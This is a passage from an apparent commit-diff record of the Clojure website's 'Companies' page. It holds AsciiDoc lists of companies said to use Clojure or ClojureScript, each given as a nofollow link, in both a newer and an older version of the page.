https:\/\/www.solita.fi\/[Solita,opts=nofollow]\n* https:\/\/soundcloud.com[Soundcloud,opts=nofollow]\n* https:\/\/www.soyoulearn.com\/[SoYouLearn,opts=nofollow]\n* https:\/\/www.sparkfund.co\/[SparkFund,opts=nofollow]\n* http:\/\/www.spinney.io\/[Spinney,opts=nofollow]\n* https:\/\/www.spotify.com[Spotify,opts=nofollow]\n* https:\/\/www.squarevenue.com[SquareVenue,opts=nofollow]\n* https:\/\/exchange.staples.com\/[Staples Exchange,opts=nofollow]\n* http:\/\/www.staples-sparx.com\/[Staples Sparx,opts=nofollow]\n* https:\/\/starcity.com\/careers[Starcity,opts=nofollow]\n* https:\/\/www.stardog.com\/[Stardog,opts=nofollow]\n* https:\/\/status.im\/[Status,opts=nofollow]\n* http:\/\/status.im[Status Research & Development GmbH,opts=nofollow]\n* https:\/\/www.stitchdata.com\/[Stitch,opts=nofollow]\n* http:\/\/structureddynamics.com\/[Structured Dynamics,opts=nofollow]\n* https:\/\/www.studio71.com\/us\/[Studio71,opts=nofollow]\n* http:\/\/www.studyflow.nl[Studyflow,opts=nofollow]\n* http:\/\/about.stylitics.com\/[Stylitics,opts=nofollow]\n* https:\/\/www.suiteness.com\/contact_us[Suiteness,opts=nofollow]\n* http:\/\/www.suprematic.net\/[Suprematic,opts=nofollow]\n* https:\/\/swiftkey.com\/[SwiftKey (Microsoft),opts=nofollow]\n* http:\/\/swirrl.com\/[Swirrl,opts=nofollow]\n* https:\/\/synple.eu\/en\/index[Synple,opts=nofollow]\n* http:\/\/www.synqrinus.com\/[Synqrinus,opts=nofollow]\n* https:\/\/www.taiste.com[Taiste,opts=nofollow]\n* https:\/\/takeoff.com[Takeoff Technologies,opts=nofollow]\n* http:\/\/talentads.net\/[TalentAds,opts=nofollow]\n* http:\/\/www.tappcommerce.com\/[Tapp Commerce,opts=nofollow]\n* https:\/\/www.tcgplayer.com\/[TCGplayer,opts=nofollow]\n* http:\/\/www.technoidentity.com\/[TechnoIdentity,opts=nofollow]\n* http:\/\/www.teradata.com[Teradata,opts=nofollow]\n* http:\/\/testdouble.com\/[Test Double,opts=nofollow]\n* https:\/\/climate.com\/[The Climate Corporation,opts=nofollow]\n* http:\/\/www.thinktopic.com\/[ThinkTopic,opts=nofollow]\n* https:\/\/github.com\/thinstripe[Thinstripe,opts=nofollow]\n* http:\/\/www.thoughtworks.com\/[ThoughtWorks,opts=nofollow]\n* http:\/\/www.threatgrid.com\/[ThreatGRID (acquired by Cisco),opts=nofollow]\n* https:\/\/www.todaqfinance.com\/[TODAQ Financial,opts=nofollow]\n* http:\/\/www.tokenmill.co\/[TokenMill,opts=nofollow]\n* https:\/\/www.tool2match.nl[Tool2Match,opts=nofollow]\n* https:\/\/www.topmonks.com\/[TopMonks,opts=nofollow]\n* https:\/\/touk.pl[TouK,opts=nofollow]\n* https:\/\/toyokumo.co.jp\/[TOYOKUMO,opts=nofollow]\n* https:\/\/www.thetrainline.com\/[Trainline,opts=nofollow]\n* https:\/\/trank.no\/[T-Rank,opts=nofollow]\n* http:\/\/www.trioptima.com\/[TriOptima,opts=nofollow]\n* https:\/\/www.troywest.com\/[Troy-West,opts=nofollow]\n* https:\/\/truckerpath.com[Trucker Path,opts=nofollow]\n* http:\/\/www.twosigma.com\/[Two Sigma,opts=nofollow]\n* https:\/\/www.ufst.dk[Udviklings- og forenklingsstyrelsen,opts=nofollow]\n* https:\/\/unacast.com\/[Unacast,opts=nofollow]\n* http:\/\/unbounce.com\/[Unbounce,opts=nofollow]\n* https:\/\/unfold.com\/[Unfold,opts=nofollow]\n* http:\/\/www.uhn.ca\/[University Health Network,opts=nofollow]\n* http:\/\/life.uni-leipzig.de[University Leipzig - Research Centre for Civilization Diseases (LIFE),opts=nofollow]\n* https:\/\/www.uplift.com[UpLift,opts=nofollow]\n* http:\/\/www.upworthy.com\/[Upworthy,opts=nofollow]\n* https:\/\/www.urbandictionary.com[Urban Dictionary,opts=nofollow]\n* http:\/\/ustream.tv\/[Ustream,opts=nofollow]\n* http:\/\/www.uswitch.com\/[uSwitch,opts=nofollow]\n* https:\/\/vakantiediscounter.nl[VakantieDiscounter,opts=nofollow]\n* http:\/\/veltio.com.br[Veltio,opts=nofollow]\n* https:\/\/www.verypossible.com[Very,opts=nofollow]\n* https:\/\/verybigthings.com[VeryBigThings,opts=nofollow]\n* https:\/\/vetd.com[Vetd,opts=nofollow]\n* https:\/\/viasat.com\/[Viasat,opts=nofollow]\n* http:\/\/vigiglobe.com\/[Vigiglobe,opts=nofollow]\n* https:\/\/www.vilect.ai\/[Vilect,opts=nofollow]\n* https:\/\/storrito.com[Vire,opts=nofollow]\n* https:\/\/www.virool.com\/[Virool,opts=nofollow]\n* http:\/\/vitallabs.co\/[Vital Labs,opts=nofollow]\n* https:\/\/www.vodori.com[Vodori,opts=nofollow]\n* http:\/\/www.walmartlabs.com\/[Walmart Labs,opts=nofollow]\n* https:\/\/weave.fi\/[Weave,opts=nofollow]\n* http:\/\/wefarm.org[WeFarm,opts=nofollow]\n* https:\/\/weshop.co.uk[WeShop,opts=nofollow]\n* https:\/\/www.whibse.com[Whibse,opts=nofollow]\n* https:\/\/pro.whitepages.com\/[Whitepages,opts=nofollow]\n* http:\/\/wikidocs.com\/[Wikidocs (acquired by Atlassian),opts=nofollow]\n* http:\/\/wildbit.com\/[Wildbit,opts=nofollow]\n* http:\/\/wit.ai[Wit.ai (acquired by Facebook),opts=nofollow]\n* https:\/\/work.co[Work & Co,opts=nofollow]\n* https:\/\/work.co\/[work.co,opts=nofollow]\n* https:\/\/workframe.com\/[Workframe,opts=nofollow]\n* http:\/\/www.workinvoice.it\/[Workinvoice,opts=nofollow]\n* https:\/\/www.works-hub.com[WorksHub,opts=nofollow]\n* https:\/\/worldsinglesnetworks.com\/[World Singles Networks,opts=nofollow]\n* https:\/\/www.xapix.io\/[Xapix GmbH,opts=nofollow]\n* https:\/\/xcoo.jp\/[Xcoo Inc.,opts=nofollow]\n* http:\/\/xnlogic.com[XN Logic,opts=nofollow]\n* http:\/\/yellerapp.com\/[Yeller,opts=nofollow]\n* http:\/\/yetanalytics.com\/[Yet Analytics,opts=nofollow]\n* http:\/\/www.yieldbot.com[Yieldbot,opts=nofollow]\n* http:\/\/yousee.dk\/[Yousee IT Innovation Labs,opts=nofollow]\n* https:\/\/www.youview.com\/[YouView,opts=nofollow]\n* http:\/\/www.yummly.com\/[Yummly,opts=nofollow]\n* http:\/\/www.yuppiechef.com\/[Yuppiechef,opts=nofollow]\n* http:\/\/tech.zalando.com[Zalando,opts=nofollow]\n* http:\/\/www.zendesk.com[Zendesk,opts=nofollow]\n* https:\/\/www.zenfinance.com.br\/[Zen Finance,opts=nofollow]\n* https:\/\/ilovezoona.com\/[Zoona,opts=nofollow]\n","old_contents":"= Companies\nAlex Miller\n2017-03-15\n:type: community\n:toc: macro\n:icons: font\n\nBelow is a partial list of some companies using Clojure or ClojureScript. Most of this information comes from direct contacts, presentations, or other online resources. If you would like to be added or removed from this list, please contact __clojure@cognitect.com__ or submit a pull request to the https:\/\/github.com\/clojure\/clojure-site[site repository].\n\nAlso, check out the <<success_stories#,Clojure Success Stories>> and <<community_stories#,Community Stories>> pages!\n\n* https:\/\/1st1.dev\/[1st1.dev,opts=nofollow]\n* http:\/\/8thlight.com\/[8th Light,opts=nofollow]\n* http:\/\/www.aclaimant.com\/[aclaimant,opts=nofollow]\n* https:\/\/www.active-group.de\/[Active Group GmbH,opts=nofollow]\n* http:\/\/www.adaptly.com\/[Adaptly,opts=nofollow]\n* http:\/\/www.adgoji.com\/[AdGoji,opts=nofollow]\n* https:\/\/www.adobe.com[Adobe,opts=nofollow]\n* https:\/\/www.adstage.io\/[AdStage,opts=nofollow]\n* http:\/\/www.advanceautoparts.com\/[Advance Auto Parts,opts=nofollow]\n* http:\/\/adzerk.com\/[Adzerk,opts=nofollow]\n* http:\/\/www.againtelligent.com\/en\/[AGA,opts=nofollow]\n* https:\/\/www.onthemarket.com[AgentsMutual\/OnTheMarket,opts=nofollow]\n* http:\/\/www.airloyal.com[Airloyal,opts=nofollow]\n* https:\/\/www.ajira.tech\/[Ajira,opts=nofollow]\n* https:\/\/www.akamai.com\/[Akamai,opts=nofollow]\n* https:\/\/akvo.org[Akvo Foundation,opts=nofollow]\n* http:\/\/www.amazon.com[Amazon,opts=nofollow]\n* https:\/\/amperity.com\/[Amperity,opts=nofollow]\n* https:\/\/www.animalia.no\/[Animalia,opts=nofollow]\n* http:\/\/annadaletech.com\/[Annadale Technologies,opts=nofollow]\n* http:\/\/www.answers.com[Answers.com,opts=nofollow]\n* http:\/\/www.anywhere.com\/[Anywhere.com,opts=nofollow]\n* https:\/\/www.apexdatasolutions.net\/[Apex Data Solutions,opts=nofollow]\n* https:\/\/apple.com[Apple,opts=nofollow]\n* http:\/\/www.appsflyer.com\/[AppsFlyer,opts=nofollow]\n* http:\/\/www.appsmiths.com\/where.php[AppSmiths,opts=nofollow]\n* http:\/\/www.appsnsites.com\/[Appsnsites,opts=nofollow]\n* http:\/\/arcstudiopro.com\/[Arc Studio Pro,opts=nofollow]\n* http:\/\/ardoq.com\/[Ardoq,opts=nofollow]\n* https:\/\/atomist.com[Atomist,opts=nofollow]\n* https:\/\/attendify.com\/[Attendify,opts=nofollow]\n* https:\/\/audiencerepublic.com[Audience Republic,opts=nofollow]\n* http:\/\/auspost.com.au\/[Australia Post,opts=nofollow]\n* http:\/\/www.autheos.com\/[Autheos,opts=nofollow]\n* https:\/\/www.bandsquare.com\/[BandSquare,opts=nofollow]\n* https:\/\/teachbanzai.com\/[Banzai,opts=nofollow]\n* http:\/\/www.baresquare.com\/[baresquare,opts=nofollow]\n* https:\/\/www.barracuda.com\/[Barracuda,opts=nofollow]\n* https:\/\/www.basefex.com\/[BaseFEX,opts=nofollow]\n* http:\/\/beanstalkapp.com\/[Beanstalk,opts=nofollow]\n* http:\/\/BearyInnovative.com[Beary Innovative,opts=nofollow]\n* https:\/\/www.beopinion.com\/[BeOpinion,opts=nofollow]\n* http:\/\/bevuta.com\/[bevuta,opts=nofollow]\n* https:\/\/www.bgpworks.com[BGPworks,opts=nofollow]\n* https:\/\/billfront.com\/[BillFront,opts=nofollow]\n* https:\/\/www.bimsystems.de\/[BIMwelt Systems,opts=nofollow]\n* https:\/\/bloomventures.io[Bloom,opts=nofollow]\n* https:\/\/www.bookwell.com.au\/[BookWell,opts=nofollow]\n* https:\/\/boundlessgeo.com\/[Boundless Geo,opts=nofollow]\n* https:\/\/brainsfeed.com[Brainsfeed,opts=nofollow]\n* https:\/\/www.braintreepayments.com\/[Braintree Payments (acquired by PayPal),opts=nofollow]\n* http:\/\/www.breezeehr.com\/[Breeze EHR,opts=nofollow]\n* http:\/\/brickalloy.com\/[BrickAlloy,opts=nofollow]\n* https:\/\/www.brightin.nl\/[Brightin,opts=nofollow]\n* https:\/\/www.broadbandspeedtest.org.uk\/[BroadbandUK,opts=nofollow]\n* http:\/\/broadpeakpartners.com[BroadPeak,opts=nofollow]\n* https:\/\/buddy.works\/[Buddy,opts=nofollow]\n* http:\/\/bugsbio.org\/[BUGS Bioscience,opts=nofollow]\n* http:\/\/buyhappy.co\/[Buy Happy,opts=nofollow]\n* https:\/\/buzzlers.com[buzzlers.com,opts=nofollow]\n* https:\/\/www.cambioscience.com[CambioScience,opts=nofollow]\n* http:\/\/cambium.consulting\/[Cambium Consulting,opts=nofollow]\n* https:\/\/www.capitalone.com\/[Capital One,opts=nofollow]\n* https:\/\/cardforcoin.com\/[cardforcoin,opts=nofollow]\n* https:\/\/carouselapps.com\/[Carousel Apps,opts=nofollow]\n* https:\/\/www.cars.co.za\/[Cars.co.za,opts=nofollow]\n* http:\/\/carwow.co.uk\/[carwow,opts=nofollow]\n* http:\/\/www.ca.com\/[CA Technologies,opts=nofollow]\n* http:\/\/www.cellusys.com[Cellusys,opts=nofollow]\n* https:\/\/mycentriq.com\/[Centriq,opts=nofollow]\n* http:\/\/www.cenx.com\/[CENX,opts=nofollow]\n* http:\/\/www.cerner.com\/[Cerner,opts=nofollow]\n* https:\/\/cervest.earth[Cervest Ltd.,opts=nofollow]\n* http:\/\/www.consumerfinance.gov\/[CFPB (Credit Financial Protection Bureau),opts=nofollow]\n* http:\/\/chariotsolutions.com\/[Chariot Solutions,opts=nofollow]\n* http:\/\/chartbeat.com[Chartbeat,opts=nofollow]\n* http:\/\/www.cicayda.com\/[Cicayda,opts=nofollow]\n* https:\/\/circleci.com\/[CircleCI,opts=nofollow]\n* https:\/\/www.cisco.com[Cisco,opts=nofollow]\n* http:\/\/www.citi.com[Citi,opts=nofollow]\n* http:\/\/clanhr.com\/en[ClanHR,opts=nofollow]\n* https:\/\/clearcoin.co[ClearCoin,opts=nofollow]\n* http:\/\/www.climate.com\/[Climate Corp (acquired by Monsanto),opts=nofollow]\n* http:\/\/www.clockworks.io\/[Clockworks,opts=nofollow]\n* http:\/\/cloudgears.com\/[CloudGears,opts=nofollow]\n* http:\/\/www.cloudrepo.io\/[CloudRepo,opts=nofollow]\n* https:\/\/clubhouse.io\/[Clubhouse,opts=nofollow]\n* http:\/\/code54.com[Code54,opts=nofollow]\n* http:\/\/codecentric.de[codecentric,opts=nofollow]\n* http:\/\/devartcodefactory.com\/[Co(de)factory,opts=nofollow]\n* http:\/\/www.codurance.com\/[Codurance,opts=nofollow]\n* https:\/\/www.cognician.com\/[Cognician,opts=nofollow]\n* http:\/\/cognitect.com[Cognitect,opts=nofollow]\n* https:\/\/collbox.co\/[CollBox,opts=nofollow]\n* http:\/\/collectivedigitalstudio.com[Collective Digital Studio,opts=nofollow]\n* http:\/\/commonwealthrobotics.com\/[Commonwealth Robotics,opts=nofollow]\n* https:\/\/commsor.com\/[Commsor,opts=nofollow]\n* http:\/\/www.condense.com.au[Condense,opts=nofollow]\n* http:\/\/www.consumerreports.org\/cro\/index.htm[Consumer Reports,opts=nofollow]\n* http:\/\/www.create.at\/[CREATE.21st century,opts=nofollow]\n* https:\/\/www.getcrossbeam.com\/[Crossbeam,opts=nofollow]\n* https:\/\/www.crossref.org\/[Crossref,opts=nofollow]\n* https:\/\/crowd.br.com\/[CROWD,opts=nofollow]\n* https:\/\/cryptowerk.com[Cryptowerk,opts=nofollow]\n* https:\/\/curbside.com[Curbside,opts=nofollow]\n* http:\/\/www.cycloid.io[Cycloid,opts=nofollow]\n* https:\/\/www.cycognito.com[CyCognito,opts=nofollow]\n* http:\/\/www.dailymail.co.uk\/[Daily Mail MailOnline,opts=nofollow]\n* https:\/\/www.databaselabs.io\/[Database Labs,opts=nofollow]\n* http:\/\/www.datacraft.sg\/[Datacraft,opts=nofollow]\n* http:\/\/www.datasnap.io\/[DataSnap.io,opts=nofollow]\n* http:\/\/www.datomic.com\/[Datomic,opts=nofollow]\n* https:\/\/www.d-n.be\/[Debreuck Neirynck (DN),opts=nofollow]\n* https:\/\/www.deep-impact.ch[Deep Impact,opts=nofollow]\n* http:\/\/degree9.io\/[Degree9,opts=nofollow]\n* http:\/\/democracy.works\/[Democracy Works,opts=nofollow]\n* https:\/\/www.deps.co[Deps,opts=nofollow]\n* http:\/\/www.designed.ly\/[Designedly,opts=nofollow]\n* https:\/\/www.db.com[Deutsche Bank,opts=nofollow]\n* https:\/\/www.devatics.com\/[Devatics,opts=nofollow]\n* http:\/\/dewise.com[Dewise,opts=nofollow]\n* https:\/\/www.diagnosia.com\/[Diagnosia,opts=nofollow]\n* https:\/\/www.discendum.com[Discendum ltd,opts=nofollow]\n* https:\/\/www.dividendfinance.com[Dividend Finance,opts=nofollow]\n* https:\/\/www.docsolver.com[DocSolver,opts=nofollow]\n* https:\/\/drevidence.com\/[Doctor Evidence,opts=nofollow]\n* https:\/\/www.doctronic.de[Doctronic,opts=nofollow]\n* http:\/\/dov-e.com[DOV-E,opts=nofollow]\n* http:\/\/dploy.io\/[dploy.io,opts=nofollow]\n* https:\/\/dreamtolearn.com[Dream to Learn,opts=nofollow]\n* http:\/\/drwtrading.com[DRW Trading Group,opts=nofollow]\n* https:\/\/www.dyne.org[Dyne.org,opts=nofollow]\n* http:\/\/www.ebay.com\/[eBay,opts=nofollow]\n* http:\/\/element84.com[Element 84,opts=nofollow]\n* http:\/\/www.empear.com\/[Empear,opts=nofollow]\n* https:\/\/writeandimprove.com\/[English Language iTutoring,opts=nofollow]\n* http:\/\/enterlab.dk[Enterlab,opts=nofollow]\n* https:\/\/www.joinef.com[Entrepreneur First,opts=nofollow]\n* http:\/\/eventfabric.com\/[Event Fabric,opts=nofollow]\n* https:\/\/eventum.no[Eventum,opts=nofollow]\n* https:\/\/evolta.fi\/[Evolta,opts=nofollow]\n* https:\/\/exoscale.ch\/[Exoscale,opts=nofollow]\n* https:\/\/www.eyeota.com\/[Eyeota,opts=nofollow]\n* http:\/\/facebook.com[Facebook,opts=nofollow]\n* http:\/\/www.facjure.com\/[Facjure,opts=nofollow]\n* http:\/\/www.factual.com\/[Factual,opts=nofollow]\n* http:\/\/www.farbetter.com\/[FarBetter,opts=nofollow]\n* https:\/\/fierce.ventures[Fierce.,opts=nofollow]\n* http:\/\/www.finalist.nl\/[Finalist,opts=nofollow]\n* https:\/\/paper.li\/[Finity AI,opts=nofollow]\n* http:\/\/www.flexiana.com\/[Flexiana,opts=nofollow]\n* http:\/\/flocktory.com[Flocktory,opts=nofollow]\n* http:\/\/www.flowa.fi\/[Flowa,opts=nofollow]\n* http:\/\/www.formcept.com\/[FORMCEPT,opts=nofollow]\n* http:\/\/try.framed.io\/[Framed Data,opts=nofollow]\n* https:\/\/freshcodeit.com\/[Freshcode,opts=nofollow]\n* https:\/\/www.fullcontact.com\/[FullContact,opts=nofollow]\n* http:\/\/functionalworks.com\/[Functional Works,opts=nofollow]\n* http:\/\/fundingcircle.com[Funding Circle,opts=nofollow]\n* http:\/\/futurice.com\/[Futurice,opts=nofollow]\n* http:\/\/www.getcontented.com.au\/[GetContented,opts=nofollow]\n* http:\/\/about.getset.com\/[GetSet,opts=nofollow]\n* http:\/\/www.gocatch.com\/[GoCatch,opts=nofollow]\n* https:\/\/gofore.com\/en\/home\/[Gofore,opts=nofollow]\n* https:\/\/www.goizper.com\/[Goizper Group,opts=nofollow]\n* https:\/\/www.go-jek.com[GO-JEK,opts=nofollow]\n* https:\/\/goldfynch.com\/[GoldFynch,opts=nofollow]\n* https:\/\/goodhertz.co\/[Goodhertz,opts=nofollow]\n* http:\/\/www.goopti.com\/[GoOpti,opts=nofollow]\n* http:\/\/www.gracenote.com\/[Gracenote,opts=nofollow]\n* https:\/\/www.grammarly.com\/[Grammarly,opts=nofollow]\n* http:\/\/www.greenpowermonitor.com\/[GreenPowerMonitor,opts=nofollow]\n* http:\/\/www.groupon.com[Groupon,opts=nofollow]\n* https:\/\/guaranteedrate.com[Guaranteed Rate,opts=nofollow]\n* https:\/\/handcheque.com\/[handcheque,opts=nofollow]\n* https:\/\/www.happymoney.com[HappyMoney,opts=nofollow]\n* https:\/\/hashrocket.com\/[Hashrocket,opts=nofollow]\n* http:\/\/www.healthfinch.com\/[healthfinch,opts=nofollow]\n* https:\/\/www.health-samurai.io[HealthSamurai,opts=nofollow]\n* https:\/\/www.helpshift.com\/[Helpshift,opts=nofollow]\n* http:\/\/www.hendrickauto.com\/[Hendrick Automotive Group,opts=nofollow]\n* https:\/\/www.heromarketing.nl\/[Hero Marketing,opts=nofollow]\n* http:\/\/www.heroku.com[Heroku,opts=nofollow]\n* https:\/\/hexawise.com\/[Hexawise,opts=nofollow]\n* https:\/\/homescreen.is\/[#Homescreen,opts=nofollow]\n* https:\/\/www.huobi.com\/[Huobi Global,opts=nofollow]\n* http:\/\/www.ib5k.com\/[IB5k,opts=nofollow]\n* https:\/\/icm-consulting.com.au\/[ICM Consulting,opts=nofollow]\n* http:\/\/labs.ig.com\/[IG,opts=nofollow]\n* https:\/\/www.imatic.cz[Imatic,opts=nofollow]\n* https:\/\/immute.co\/[Immute,opts=nofollow]\n* https:\/\/indabamusic.com[Indaba Music,opts=nofollow]\n* http:\/\/innoq.com[InnoQ,opts=nofollow]\n* https:\/\/instadeq.com\/[instadeq,opts=nofollow]\n* http:\/\/www.intentmedia.com\/[Intent Media,opts=nofollow]\n* http:\/\/www.interware.com.mx\/[InterWare,opts=nofollow]\n* http:\/\/www.intropica.com\/[Intropica,opts=nofollow]\n* http:\/\/www.intuit.com[Intuit,opts=nofollow]\n* http:\/\/www.iplantcollaborative.org\/[iPlant Collaborative,opts=nofollow]\n* https:\/\/www.iprally.com[IPRally Technologies,opts=nofollow]\n* http:\/\/iris.tv\/[IRIS.TV,opts=nofollow]\n* https:\/\/www.jcrew.com\/[J.Crew,opts=nofollow]\n* https:\/\/jesi.io[JESI,opts=nofollow]\n* http:\/\/juxt.pro[JUXT,opts=nofollow]\n* http:\/\/www.kane-group.com\/[Kane LPI,opts=nofollow]\n* https:\/\/kasta.ua[Kasta,opts=nofollow]\n* https:\/\/kirasystems.com\/[Kira,opts=nofollow]\n* https:\/\/klarna.com[Klarna,opts=nofollow]\n* http:\/\/knowledgee.com\/[Knowledge E,opts=nofollow]\n* http:\/\/www.kodemaker.no\/[Kodemaker,opts=nofollow]\n* https:\/\/kwelia.com\/[Kwelia,opts=nofollow]\n* https:\/\/www.ladderlife.com[Ladder,opts=nofollow]\n* https:\/\/www.theladders.com\/[Ladders,opts=nofollow]\n* https:\/\/lambdawerk.com\/[LambdaWerk,opts=nofollow]\n* https:\/\/www.latacora.com\/[Latacora,opts=nofollow]\n* http:\/\/leancloud.cn[Leancloud.cn,opts=nofollow]\n* http:\/\/en.leanheat.com[Leanheat,opts=nofollow]\n* https:\/\/lemmings.io[Lemmings,opts=nofollow]\n* https:\/\/www.lemonpi.io\/[LemonPI,opts=nofollow]\n* https:\/\/www.lendup.com\/[LendUp,opts=nofollow]\n* http:\/\/levelmoney.com[Level Money,opts=nofollow]\n* http:\/\/www.lifebooker.com[Lifebooker,opts=nofollow]\n* http:\/\/liftoff.io\/[Liftoff,opts=nofollow]\n* http:\/\/lightmesh.com[LightMesh,opts=nofollow]\n* http:\/\/likely.co\/[Likely,opts=nofollow]\n* https:\/\/line.me\/[LINE,opts=nofollow]\n* https:\/\/fluent.express[LinguaTrip,opts=nofollow]\n* http:\/\/linkfluence.com[Linkfluence,opts=nofollow]\n* http:\/\/www.listora.com\/[Listora,opts=nofollow]\n* http:\/\/www.liveops.com\/[LiveOps,opts=nofollow]\n* https:\/\/www.livingsocial.com\/[LivingSocial,opts=nofollow]\n* https:\/\/www.localize.city\/[Localize.city,opts=nofollow]\n* https:\/\/locarise.com\/[Locarise,opts=nofollow]\n* http:\/\/logicsoft.co.in\/[Logic Soft Pvt. Ltd.,opts=nofollow]\n* http:\/\/lonocloud.com\/[LonoCloud (acquired by ViaSat),opts=nofollow]\n* https:\/\/www.loway.ch\/[Loway,opts=nofollow]\n* https:\/\/lucidit.consulting[Lucid IT Consulting LLC,opts=nofollow]\n* http:\/\/www.lumanu.com\/[Lumanu,opts=nofollow]\n* https:\/\/www.lunchboxsessions.com[LunchBox Sessions,opts=nofollow]\n* https:\/\/www.macrofex.com\/[Macrofex,opts=nofollow]\n* http:\/\/www.macrofex.com[MACROFEX LLC,opts=nofollow]\n* http:\/\/www.madriska.com\/[Madriska Inc.,opts=nofollow]\n* http:\/\/www.magnet.coop\/[Magnet,opts=nofollow]\n* http:\/\/mainstreetgenome.com\/[Main Street Genome,opts=nofollow]\n* https:\/\/www.makimo.pl\/[Makimo, opts=nofollow]\n* http:\/\/www.comidadagente.org\/[Marktbauer\/Comida da gente,opts=nofollow]\n* http:\/\/www.mastodonc.com\/[Mastodon C,opts=nofollow]\n* http:\/\/mayvenn.com[Mayvenn,opts=nofollow]\n* https:\/\/mazira.com\/[Mazira,opts=nofollow]\n* http:\/\/www.mediquest.nl\/[Mediquest,opts=nofollow]\n* http:\/\/meewee.com[MeeWee,opts=nofollow]\n* https:\/\/www.merantix.com\/[Merantix,opts=nofollow]\n* http:\/\/www.metabase.com\/[Metabase,opts=nofollow]\n* http:\/\/www.metail.com[Metail,opts=nofollow]\n* http:\/\/metosin.fi\/[Metosin,opts=nofollow]\n* http:\/\/minorodata.com\/[Minoro,opts=nofollow]\n* https:\/\/mixpanel.com\/[Mixpanel,opts=nofollow]\n* http:\/\/www.mixrad.io\/[MixRadio,opts=nofollow]\n* http:\/\/www.modelogiq.com\/[modelogiq,opts=nofollow]\n* http:\/\/www.molequedeideias.net\/[Moleque de Ideias,opts=nofollow]\n* https:\/\/www.motiva.ai\/[Motiva AI,opts=nofollow]\n* http:\/\/multis.co\/[Multis,opts=nofollow]\n* http:\/\/www.mysema.com\/[Mysema,opts=nofollow]\n* http:\/\/nemCV.com[nemCV.com,opts=nofollow]\n* https:\/\/www.netflix.com[Netflix,opts=nofollow]\n* https:\/\/www.neustar.biz\/[Neustar,opts=nofollow]\n* http:\/\/nexonit.com[nexonit.com,opts=nofollow]\n* http:\/\/www.nextangles.com[NextAngles,opts=nofollow]\n* https:\/\/nextjournal.com\/[Nextjournal,opts=nofollow]\n* http:\/\/nilenso.com\/[nilenso,opts=nofollow]\n* https:\/\/www.nitor.com[Nitor,opts=nofollow]\n* https:\/\/nederlandsegokkasten.com\/[NLG,opts=nofollow]\n* https:\/\/nomnominsights.com[NomNom Insights,opts=nofollow]\n* https:\/\/www.norled.no\/[Norled,opts=nofollow]\n* http:\/\/lamuz.uz[NowMedia Tech,opts=nofollow]\n* https:\/\/nsd.no[NSD - Norwegian Centre for Research Data,opts=nofollow]\n* https:\/\/www.nubank.com.br\/[Nubank,opts=nofollow]\n* https:\/\/nukomeet.com\/[Nukomeet,opts=nofollow]\n* http:\/\/numerical.co.nz\/[Numerical Brass Computing,opts=nofollow]\n* https:\/\/www.ochedart.com\/[Oche Dart,opts=nofollow]\n* https:\/\/oiiku.com[Oiiku,opts=nofollow]\n* https:\/\/okletsplay.com\/[OkLetsPlay,opts=nofollow]\n* http:\/\/www.omnyway.com\/[Omnyway Inc,opts=nofollow]\n* https:\/\/ona.io[Ona,opts=nofollow]\n* https:\/\/onfido.com\/gb\/[Onfido,opts=nofollow]\n* https:\/\/onlinecasinoinformatie.com\/[OnlineCasinoInformatie,opts=nofollow]\n* http:\/\/www.onthemarket.com\/[OnTheMarket,opts=nofollow]\n* https:\/\/opencompany.com\/[OpenCompany,opts=nofollow]\n* http:\/\/OpenSensors.io[OpenSensors.io,opts=nofollow]\n* http:\/\/www.opentable.com\/[OpenTable,opts=nofollow]\n* http:\/\/www.oracle.com[Oracle,opts=nofollow]\n* http:\/\/www.orgsync.com\/[OrgSync,opts=nofollow]\n* https:\/\/www.orkli.com\/en[Orkli,opts=nofollow]\n* https:\/\/www.oscaro.com\/[Oscaro,opts=nofollow]\n* http:\/\/otto.de[Otto,opts=nofollow]\n* http:\/\/ourhub.dk[OurHub,opts=nofollow]\n* http:\/\/www.outpace.com\/[Outpace,opts=nofollow]\n* http:\/\/corp.outpostgames.com\/[Outpost Games,opts=nofollow]\n* http:\/\/owsy.com[Owsy,opts=nofollow]\n* https:\/\/oysterlab.ch[Oyster Lab by Alpiq,opts=nofollow]\n* http:\/\/paddleguru.com[PaddleGuru,opts=nofollow]\n* http:\/\/www.bdpanacea.com\/[Panacea Systems,opts=nofollow]\n* https:\/\/www.pandora.com\/[Pandora,opts=nofollow]\n* http:\/\/paper.li[paper.li,opts=nofollow]\n* https:\/\/www.parcelbright.com\/[ParcelBright,opts=nofollow]\n* https:\/\/partsbox.io\/[PartsBox,opts=nofollow]\n* http:\/\/www.passivsystems.com\/[PassivSystems,opts=nofollow]\n* http:\/\/path.com\/[Path,opts=nofollow]\n* http:\/\/paygarden.com[PayGarden,opts=nofollow]\n* https:\/\/paygo.com.br[PayGo,opts=nofollow]\n* https:\/\/www.payoff.com\/[Payoff,opts=nofollow]\n* http:\/\/www.pennymacusa.com[PennyMac,opts=nofollow]\n* https:\/\/pilloxa.com[Pilloxa,opts=nofollow]\n* https:\/\/pisano.co\/[Pisano,opts=nofollow]\n* https:\/\/pitch.com\/[Pitch,opts=nofollow]\n* http:\/\/www.pivotal.io\/[Pivotal Labs,opts=nofollow]\n* https:\/\/www.pkc.io\/[PKC,opts=nofollow]\n* http:\/\/www.pointslope.com[Point Slope,opts=nofollow]\n* https:\/\/pol.is\/about\/[Pol.is,opts=nofollow]\n* http:\/\/dmarc.postmarkapp.com\/[Postmark,opts=nofollow]\n* https:\/\/precursorapp.com\/[Precursor,opts=nofollow]\n* http:\/\/www.premium.nl\/[Premium Business Consultants BV,opts=nofollow]\n* http:\/\/prime.vc\/[Prime.vc,opts=nofollow]\n* http:\/\/www.print.io\/[Print.IO,opts=nofollow]\n* https:\/\/projectmaterials.com[projectmaterials.com,opts=nofollow]\n* http:\/\/projexsys.com\/[Projexsys,opts=nofollow]\n* https:\/\/www.protopie.io\/[ProtoPie,opts=nofollow]\n* https:\/\/publizr.com\/[Publizr,opts=nofollow]\n* http:\/\/puppetlabs.com\/[Puppet Labs,opts=nofollow]\n* https:\/\/www.purposefly.com\/[PurposeFly,opts=nofollow]\n* https:\/\/quartethealth.com\/[Quartet Health,opts=nofollow]\n* http:\/\/www.quintype.com\/[Quintype,opts=nofollow]\n* https:\/\/qvantel.com\/[Qvantel,opts=nofollow]\n* http:\/\/www.radiantlabs.co[Radiant Labs,opts=nofollow]\n* https:\/\/radioactive.sg[RADIOactive,opts=nofollow]\n* http:\/\/reaktor.com\/[Reaktor,opts=nofollow]\n* https:\/\/www.redhat.com\/[Red Hat,opts=nofollow]\n* https:\/\/www.redpineapplemedia.com\/[Red Pineapple Media,opts=nofollow]\n* https:\/\/www.reifyhealth.com\/[Reify 